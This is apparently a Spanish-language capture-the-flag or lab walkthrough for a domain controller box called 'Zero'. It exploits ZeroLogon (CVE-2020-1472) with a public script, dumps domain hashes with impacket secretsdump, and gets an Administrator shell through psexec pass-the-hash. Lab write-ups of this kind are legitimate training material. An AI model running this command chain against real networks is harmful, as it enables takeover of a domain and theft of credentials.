nmap -A -p- -oA zero 172.31.1.29 --min-rate=10000 --script=vuln --script-imeout=15 -v

nmap -sC -sV -O -p- -oA zero 172.31.1.29

nmap -sU -O -p- -oA zero-udp 172.31.1.29

Empezamos a buscar algun exploit que tenga que ver con ZeroLogon. Esto no es obvio en la informacion que se despliega en el nmap.

https://github.com/dirkjanm/CVE-2020-1472

Bajamos el script de python y corremos lo siguiente:

python3 cve-2020-1472-exploit.py Zero-DC 172.31.1.29

Pasted image 20210701100446.png

Despues corremos esto con impacket.

python3 /opt/impacket/examples/secretsdump.py -no-pass -just-dc zero/'Zero-DC$'@172.31.1.29

Pasted image 20210701114706.png

python3 /opt/impacket/examples/psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:36242e2cb0b26d16fafd26739ccf990 Administrator@172.31.1.29

Pasted image 20210701115455.png

boxes

copyright©2022 Cu3rv0x all rights reserved